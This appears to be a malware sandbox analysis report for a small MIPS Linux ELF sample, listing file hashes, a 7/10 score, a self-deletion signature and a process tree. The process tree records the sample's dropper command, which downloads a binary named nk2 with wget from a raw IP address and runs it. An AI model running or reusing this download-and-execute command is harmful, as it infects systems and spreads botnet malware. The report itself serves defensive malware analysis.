Overview

overview

7

Static

static

7

681429df8e...29.elf

debian-9-mips

7

Analysis

  • max time kernel
    7s
  • max time network
    0s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231221-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20231221-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    13/02/2024, 02:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29.elf

  • Size

    12KB

  • MD5

    79fa7829d645bd9333c3ea02772b5ce1

  • SHA1

    e7e587543b8520dd8b8fcd4452d8002f52fad330

  • SHA256

    681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29

  • SHA512

    78849fa3c534bea8ee7ca68280ae0daa800307f3becc94d5fbb90d1dda7d62ea323a9e36861da284bd93785c3bdb00f64dff31d49dfb3839de57116be6824b94

  • SSDEEP

    384:BCcMSz+diEZg1Ut5zCK6T9z6xd/QOHfHo:gTS6cET6K6T9OUOvo

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs

Processes

  • /tmp/681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29.elf
    /tmp/681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29.elf
    1⤵
    • Deletes itself
    PID:717
    • /bin/sh
      sh -c "wget http://198.98.51.91/abdagoodamagalu/nk2; chmod 777 *; ./nk2 wget.echo.telnet.mips"
      2⤵
        PID:763
        • /usr/bin/wget
          wget http://198.98.51.91/abdagoodamagalu/nk2
          3⤵
            PID:764
          • /bin/chmod
            chmod 777 systemd-private-7125d7b327a440bd854efe7e0189b918-systemd-timedated.service-Zr8NHm
            3⤵
              PID:768
            • /tmp/nk2
              ./nk2 wget.echo.telnet.mips
              3⤵
                PID:769

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads